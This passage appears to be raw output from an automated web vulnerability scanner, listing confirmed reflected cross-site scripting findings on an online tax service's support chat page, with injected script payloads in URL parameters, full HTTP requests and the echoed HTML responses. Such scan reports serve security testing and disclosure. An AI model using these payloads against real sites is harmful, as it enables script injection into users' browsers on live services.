width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" style="display: none"> <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" > <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <!-- Notes ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="label" colspan="2">Please Note: <br /> &l..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=3&p_sid=TyYLtJsk&p_accessibili..

Parameters

Parameter Type Value
OLTSite GET 3
p_sid GET TyYLtJsk
p_accessibility GET 1
p_redirect GET '"--></style></script><script>alert(0x0022A5)</script>
p_lva GET 372
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=3&p_sid=TyYLtJsk&p_accessibility=1&p_redirect=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0022A5)%3C%2Fscript%3E&p_lva=372&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_adp.php?p_faqid=372&p_created=1122357413&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_lva=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_li=&p_topview=1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:06:16 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=256354 t=1304121976135709
RNT-Machine: 06
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4325
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=3&p_sid=pm2vjKsk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0022A5)%5C/script%5E&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=3&p_sid=pm2vjKsk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0022A5)%5C/script%5E&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=3&p_sid=pm2vjKsk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0022A5)%5C/script%5E&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=3&p_sid=pm2vjKsk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0022A5)%5C/script%5E&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect='"--></style></script><script>netsparker(0x0022A5)</script>"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=3&p_sid=pm2vjKsk&amp;p_accessibility=1&amp;p_redirect='"--></style></script><script>netsparker(0x0022A5)</script>&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" style="display: none"> <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" > <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <!-- Notes ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td c..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=3&p_sid=TyYLtJsk&p_accessibili..

Parameters

Parameter Type Value
OLTSite GET 3
p_sid GET TyYLtJsk
p_accessibility GET 1
p_redirect GET 3
p_lva GET 372'"--></style></script><script>alert(0x0022B2)</script>
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=3&p_sid=TyYLtJsk&p_accessibility=1&p_redirect=3&p_lva=372%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0022B2)%3C%2Fscript%3E&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_adp.php?p_faqid=372&p_created=1122357413&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_lva=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_li=&p_topview=1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:06:18 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=247142 t=1304121978918009
RNT-Machine: 06
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4326
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=3&p_sid=KwFvjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0022B2)%5C/script%5E&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=3&p_sid=KwFvjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0022B2)%5C/script%5E&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=3&p_sid=KwFvjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0022B2)%5C/script%5E&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" 